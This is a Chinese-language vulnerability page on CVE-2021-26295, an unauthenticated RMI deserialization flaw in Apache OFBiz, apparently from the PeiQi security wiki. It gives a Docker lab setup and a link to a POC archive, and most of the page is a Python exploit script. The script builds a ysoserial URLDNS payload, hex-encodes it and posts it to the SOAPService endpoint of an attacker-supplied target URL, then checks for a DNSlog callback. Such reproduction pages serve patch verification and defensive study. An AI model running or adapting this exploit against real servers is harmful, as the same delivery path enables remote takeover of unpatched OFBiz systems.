(CVE-2021-26295)Apache_OFBiz_RMI反序列化漏洞

# (CVE-2021-26295)Apache OFBiz RMI反序列化漏洞

## 漏洞描述
OFBiz是基于Java的Web框架,包括实体引擎,服务引擎和基于小部件的UI。
近日,Apache OFBiz官方发布安全更新。Apache OFBiz 存在RMI反序列化前台命令执行,未经身份验证的攻击者可以使用此漏洞来成功接管Apache OFBiz,建议相关用户尽快测试漏洞修复的版本并及时升级。

## 漏洞影响
Apache OFBiz < 17.12.06 ## 漏洞复现 Docker安装环境 ```bash docker run -d -p 8000:8080 -p 8443:8443 opensourceknight/ofbiz ``` ![](/static/qingy/(CVE-2021-26295)Apache_OFBiz_RMI反序列化漏洞/img/1.png) 使用POC验证Dnslog响应 ![](/static/qingy/(CVE-2021-26295)Apache_OFBiz_RMI反序列化漏洞/img/2.png) ## 漏洞POC ```bash 下载地址 http://peiqi.tech/shentou/CVE-2021-26295.zip POC参考了网上公开的几位师傅的脚本 ``` ```python import requests import sys import sys import subprocess import binascii from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m') print('+ \033[34m公众号 : PeiQi文库 \033[0m') print('+ \033[34mVersion: Apache OFBiz \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m’)
print(‘+ \033[36mDnslog >>> http://xxx.xxx.xxx.xxx \033[0m’)
print(‘+——————————————‘)

def trans(s):
return “%s” % ”.join(‘%.2x’ % x for x in s)

def POC_1(target_url, Dnslog):
popen = subprocess.Popen([‘java’, ‘-jar’, ‘ysoserial.jar’, “URLDNS”, Dnslog], stdout=subprocess.PIPE)
data = popen.stdout.read()
hex_data = trans(data)
headers = {
‘Content-Type’: ‘text/xml’
}
post_data = ”’%s”’ % hex_data
vuln_url = target_url + “/webtools/control/SOAPService”
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=post_data, headers=headers, verify=False, timeout=5)
print(“\033[36m[o] 正在请求 {}/webtools/control/SOAPService….. \033[0m”.format(target_url))
if response.status_code == 200:
print(“\033[36m[o] 请检查 Dnslog 响应\n \033[0m”)
else:
print(“\033[31m[x] 请求失败 \033[0m”)
sys.exit(0)

except Exception as e:
print(“\033[31m[x] 请求失败 \033[0m”)

if __name__ == ‘__main__’:
title()
target_url = str(input(“\033[35mPlease input Attack Url\nUrl >>> \033[0m”))
Dnslog = str(input(“\033[35mDnslog >>> \033[0m”))
POC_1(target_url, Dnslog)
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容